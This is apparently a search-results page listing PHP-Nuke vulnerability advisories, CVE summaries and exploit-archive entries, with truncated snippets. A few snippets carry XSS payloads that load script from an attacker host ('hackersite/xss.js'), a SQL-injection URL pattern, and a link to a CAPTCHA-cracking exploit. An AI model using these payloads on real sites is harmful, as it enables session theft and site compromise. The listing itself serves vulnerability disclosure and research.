1732 matches found
Cross-Site Scripting vulnerabilities in PHP-Nuke
Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting уязвимостях в PHP-Nuke. XSS: POST запрос на странице http://site/modules.php?name=YourAccount&op=newuser "script src=http://site/script.js В полях: gfxcheck и randomnum. Эксплоит:...
phpnuke79te-sql.txt
================================================================================ | | | | | | | | | | | | | | | ' | | '/ | | || | | |/ \ | | | | | | | | | | | | | | || || | / | | || || |||| ,| |, || | | |/ | | | | / | | | | \ \ / / | | | | '| | | | | | | | | / | || | | | | || || | | | |/...
Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc. PHP-Nuke AutoHTML Module 2.0 - crossite scripting...
Cross-Site Scripting vulnerability in AutoHTML for PHP-Nuke
Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting уязвимости в AutoHTML для PHP-Nuke. XSS: http://site/autohtml.php?filename=3Cscript20src=http://hackersite/xss.js20 Уязвима версия PHP-Nuke AutoHTML Module 2.0 и потенциально другие версии. Дополнительная информация о данной...
phpkuran-sql.txt
Author : Lovebug Italy Rbt-4 Crew www.rbt-4.net PHP-Nuke Module KuraniKerim sid SQL Injection Bug : modules.php?name=KuraniKerim&op=TurkceNukeComIslamiModullerDestekSitesi&sid = S Q L Exploit...
PHP-Nuke KuiraniKerim Module - sid SQL Injection
PHP-Nuke KuiraniKerim Module - sid SQL Injection source: https://www.securityfocus.com/bid/29261/info The 'KuiraniKerim' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this iss...
PHP-Nuke 'KuiraniKerim' Module - 'sid' SQL Injection
source: https://www.securityfocus.com/bid/29261/info The 'KuiraniKerim' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the...
CVE-2008-2020
The CAPTCHA implementation as used in 1 Francisco Burzi PHP-Nuke 7.0 and 8.1, 2 my123tkShop e-Commerce-Suite aka 123tkShop 0.9.1, 3 phpMyBitTorrent 1.2.2, 4 TorrentFlux 2.3, 5 e107 0.7.11, 6 WebZE 0.5.9, 7 Open Media Collectors Database aka OpenDb 1.5.0b4, and 8 Labgab 1.1 uses a codebg.jpg...
CVE-2008-2020
The CVE-2008-2020 issue affects multiple CAPTCHA implementations: PHP-Nuke (versions 7.0–8.1), my123tkShop 0.9.1, phpMyBitTorrent 1.2.2, TorrentFlux 2.3, e107 0.7.11, WebZE 0.5.9, Open Media Collectors Database 1.5.0b4, and Labgab 1.1. The root cause is use of a code_bg.jpg background with PHP Im...
PT-2008-3540 · Francisco Burzi +7 · Php-Nuke +7
Name of the Vulnerable Software and Affected Versions: Francisco Burzi PHP-Nuke versions 7.0 through 8.1 my123tkShop e-Commerce-Suite version 0.9.1 phpMyBitTorrent version 1.2.2 TorrentFlux version 2.3 e107 version 0.7.11 WebZE version 0.5.9 Open Media Collectors Database version 1.5.0b4 Labgab...
PHP-Nuke DownloadsPlus Module - Arbitrary File Upload
source: https://www.securityfocus.com/bid/28919/info The DownloadsPlus module for PHP-Nuke is prone to a vulnerability that lets remote attackers upload and execute arbitrary code because the application fails to sanitize user-supplied input. This issue permits attackers to upload arbitrary files...
PHP-Nuke DownloadsPlus Module - Arbitrary File Upload
PHP-Nuke DownloadsPlus Module - Arbitrary File Upload source: https://www.securityfocus.com/bid/28919/info The DownloadsPlus module for PHP-Nuke is prone to a vulnerability that lets remote attackers upload and execute arbitrary code because the application fails to sanitize user-supplied input...
Deciphering the PHP-Nuke Capthca
The Capthca used in the current version 8.1 of PHP Nuke can be deciphered with 100 accuracy. more information can be found her: http://www.rooksecurity.com/blog/?p=6 Exploit Code: http://www.rooksecurity.com/exploits/phpnukecaptcha.zip What is so interesting about this captcha is that it is...
CVE-2008-1680
PHP-Nuke Platinum 7.6.b.5 allows remote attackers to obtain configuration information via a direct request to maintenance/index.php, which reveals settings such as magicquotesgpc...
Information disclosure
PHP-Nuke Platinum 7.6.b.5 allows remote attackers to obtain configuration information via a direct request to maintenance/index.php, which reveals settings such as magicquotesgpc...
CVE-2008-1680
CVE-2008-1680 affects PHP-Nuke Platinum 7.6.b.5, where a direct request to maintenance/index.php allows remote attackers to disclose configuration information, including settings such as magic_quotes_gpc. The issue is categorized as information disclosure with a CVSS v2 base score of 5.0 (Network...
CVE-2008-1680
PHP-Nuke Platinum 7.6.b.5 allows remote attackers to obtain configuration information via a direct request to maintenance/index.php, which reveals settings such as magicquotesgpc...
CVE-2008-1539
SQL injection vulnerability in includes/dynamictitles.php in PHP-Nuke Platinum 7.6.b.5 allows remote attackers to execute arbitrary SQL commands via the p parameter to modules.php for the Forums module...
Sql injection
SQL injection vulnerability in includes/dynamictitles.php in PHP-Nuke Platinum 7.6.b.5 allows remote attackers to execute arbitrary SQL commands via the p parameter to modules.php for the Forums module...
CVE-2008-1539
SQL injection vulnerability in includes/dynamictitles.php in PHP-Nuke Platinum 7.6.b.5 allows remote attackers to execute arbitrary SQL commands via the p parameter to modules.php for the Forums module...